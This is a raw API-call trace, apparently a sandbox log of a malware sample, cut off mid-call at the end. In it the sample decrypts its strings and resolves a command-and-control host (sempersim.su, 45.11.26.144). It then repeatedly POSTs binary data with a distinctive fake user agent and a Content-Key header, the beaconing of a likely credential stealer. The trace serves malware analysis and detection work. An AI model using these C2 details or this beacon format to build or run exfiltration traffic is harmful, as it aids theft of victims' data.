dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.617] GetProcessHeap () returned 0x5b0000 [0279.617] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0279.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.618] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3500, pdwDataLen=0xdfcfc | out: pbData=0x5d3500, pdwDataLen=0xdfcfc) returned 1 [0279.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.620] CryptDestroyKey (hKey=0x5be288) returned 1 [0279.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.621] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0279.621] GetProcessHeap () returned 0x5b0000 [0279.621] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0279.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0279.622] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0279.622] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0279.660] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0279.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0279.661] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0279.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0279.662] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0279.662] GetProcessHeap () returned 0x5b0000 [0279.662] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0279.662] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0279.663] GetProcessHeap () returned 0x5b0000 [0279.663] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0279.663] GetProcessHeap () returned 0x5b0000 [0279.663] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0279.663] GetProcessHeap () returned 0x5b0000 [0279.663] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3500 | out: hHeap=0x5b0000) returned 1 [0279.663] GetProcessHeap () returned 0x5b0000 [0279.663] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d32c0 [0279.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.664] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0279.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.673] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0279.681] GetProcessHeap () returned 0x5b0000 [0279.681] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0279.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.682] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0279.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.683] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0279.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.684] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.684] GetProcessHeap () returned 0x5b0000 [0279.685] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0279.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.686] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d32c0, pdwDataLen=0xdfcfc | out: pbData=0x5d32c0, pdwDataLen=0xdfcfc) returned 1 [0279.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.689] CryptDestroyKey (hKey=0x5be288) returned 1 [0279.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.690] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0279.690] GetProcessHeap () returned 0x5b0000 [0279.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0279.690] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0279.690] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0279.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0279.691] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0279.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0279.692] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0279.692] GetProcessHeap () returned 0x5b0000 [0279.692] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0279.692] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdc28*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0279.696] GetProcessHeap () returned 0x5b0000 [0279.696] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9e0 [0279.696] socket (af=2, type=1, protocol=6) returned 0x3dc [0279.696] connect (s=0x3dc, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0279.769] FreeAddrInfoW (pAddrInfo=0x5cdc28*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0279.769] GetProcessHeap () returned 0x5b0000 [0279.769] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0279.769] GetProcessHeap () returned 0x5b0000 [0279.769] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0279.770] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0279.771] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0279.771] GetProcessHeap () returned 0x5b0000 [0279.771] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0279.771] GetProcessHeap () returned 0x5b0000 [0279.771] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0279.772] GetProcessHeap () returned 0x5b0000 [0279.772] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2f60 [0279.772] GetProcessHeap () returned 0x5b0000 [0279.772] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0279.772] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0279.773] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0279.773] GetProcessHeap () returned 0x5b0000 [0279.773] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0279.773] GetProcessHeap () returned 0x5b0000 [0279.774] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0279.774] send (s=0x3dc, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0279.774] send (s=0x3dc, buf=0x5d1e18*, len=159, flags=0) returned 159 [0279.775] GetProcessHeap () returned 0x5b0000 [0279.775] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0279.775] recv (in: s=0x3dc, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0281.254] GetProcessHeap () returned 0x5b0000 [0281.255] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0281.255] GetProcessHeap () returned 0x5b0000 [0281.255] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2f60 | out: hHeap=0x5b0000) returned 1 [0281.255] GetProcessHeap () returned 0x5b0000 [0281.255] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0281.256] GetProcessHeap () returned 0x5b0000 [0281.256] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0281.256] closesocket (s=0x3dc) returned 0 [0281.257] GetProcessHeap () returned 0x5b0000 [0281.257] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9e0 | out: hHeap=0x5b0000) returned 1 [0281.257] GetProcessHeap () returned 0x5b0000 [0281.257] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0281.257] GetProcessHeap () returned 0x5b0000 [0281.258] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0281.258] GetProcessHeap () returned 0x5b0000 [0281.258] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0281.258] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc50) returned 0x3dc [0281.261] Sleep (dwMilliseconds=0xea60) [0281.265] GetProcessHeap () returned 0x5b0000 [0281.265] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2fa8 [0281.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.267] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0281.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.277] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5aa8) returned 1 [0281.289] GetProcessHeap () returned 0x5b0000 [0281.289] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0281.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.290] CryptImportKey (in: hProv=0x5c5aa8, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0281.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.291] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0281.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.292] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.292] GetProcessHeap () returned 0x5b0000 [0281.293] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0281.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.294] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2fa8, pdwDataLen=0xdfcfc | out: pbData=0x5d2fa8, pdwDataLen=0xdfcfc) returned 1 [0281.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.295] CryptDestroyKey (hKey=0x5be048) returned 1 [0281.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.303] CryptReleaseContext (hProv=0x5c5aa8, dwFlags=0x0) returned 1 [0281.303] GetProcessHeap () returned 0x5b0000 [0281.303] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5d60 [0281.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0281.304] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0281.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0281.305] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0281.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0281.306] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0281.307] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0281.307] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0281.307] GetProcessHeap () returned 0x5b0000 [0281.307] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0281.307] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0281.308] GetProcessHeap () returned 0x5b0000 [0281.309] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0281.309] GetProcessHeap () returned 0x5b0000 [0281.309] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0281.309] GetProcessHeap () returned 0x5b0000 [0281.309] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2fa8 | out: hHeap=0x5b0000) returned 1 [0281.309] GetProcessHeap () returned 0x5b0000 [0281.309] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3308 [0281.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.310] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0281.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.319] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0281.328] GetProcessHeap () returned 0x5b0000 [0281.329] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0281.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.329] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0281.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.330] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0281.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.331] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.331] GetProcessHeap () returned 0x5b0000 [0281.331] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0281.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.332] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3308, pdwDataLen=0xdfcfc | out: pbData=0x5d3308, pdwDataLen=0xdfcfc) returned 1 [0281.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.333] CryptDestroyKey (hKey=0x5be048) returned 1 [0281.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0281.334] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0281.334] GetProcessHeap () returned 0x5b0000 [0281.334] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0281.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0281.335] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0281.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0281.336] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0281.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0281.337] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0281.337] GetProcessHeap () returned 0x5b0000 [0281.337] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0281.337] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cda20*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0281.339] GetProcessHeap () returned 0x5b0000 [0281.339] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca960 [0281.339] socket (af=2, type=1, protocol=6) returned 0x3e0 [0281.339] connect (s=0x3e0, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0281.409] FreeAddrInfoW (pAddrInfo=0x5cda20*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0281.409] GetProcessHeap () returned 0x5b0000 [0281.409] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0281.409] GetProcessHeap () returned 0x5b0000 [0281.409] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0281.410] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0281.411] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0281.411] GetProcessHeap () returned 0x5b0000 [0281.411] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0281.411] GetProcessHeap () returned 0x5b0000 [0281.412] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0281.412] GetProcessHeap () returned 0x5b0000 [0281.412] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3590 [0281.412] GetProcessHeap () returned 0x5b0000 [0281.412] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0281.412] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0281.413] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0281.413] GetProcessHeap () returned 0x5b0000 [0281.413] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0281.413] GetProcessHeap () returned 0x5b0000 [0281.414] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0281.414] send (s=0x3e0, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0281.415] send (s=0x3e0, buf=0x5d1e18*, len=159, flags=0) returned 159 [0281.415] GetProcessHeap () returned 0x5b0000 [0281.415] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0281.415] recv (in: s=0x3e0, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0282.758] GetProcessHeap () returned 0x5b0000 [0282.759] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0282.759] GetProcessHeap () returned 0x5b0000 [0282.759] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3590 | out: hHeap=0x5b0000) returned 1 [0282.759] GetProcessHeap () returned 0x5b0000 [0282.760] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0282.760] GetProcessHeap () returned 0x5b0000 [0282.760] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0282.760] closesocket (s=0x3e0) returned 0 [0282.764] GetProcessHeap () returned 0x5b0000 [0282.764] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca960 | out: hHeap=0x5b0000) returned 1 [0282.764] GetProcessHeap () returned 0x5b0000 [0282.764] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0282.765] GetProcessHeap () returned 0x5b0000 [0282.766] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3308 | out: hHeap=0x5b0000) returned 1 [0282.766] GetProcessHeap () returned 0x5b0000 [0282.766] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0282.770] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc54) returned 0x3e0 [0282.772] Sleep (dwMilliseconds=0xea60) [0282.785] GetProcessHeap () returned 0x5b0000 [0282.785] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3470 [0282.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.786] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0282.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.795] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5910) returned 1 [0282.806] GetProcessHeap () returned 0x5b0000 [0282.806] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0282.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.807] CryptImportKey (in: hProv=0x5c5910, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0282.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.808] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0282.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.809] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.809] GetProcessHeap () returned 0x5b0000 [0282.810] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0282.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.811] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3470, pdwDataLen=0xdfcfc | out: pbData=0x5d3470, pdwDataLen=0xdfcfc) returned 1 [0282.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.812] CryptDestroyKey (hKey=0x5be048) returned 1 [0282.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0282.815] CryptReleaseContext (hProv=0x5c5910, dwFlags=0x0) returned 1 [0282.815] GetProcessHeap () returned 0x5b0000 [0282.816] 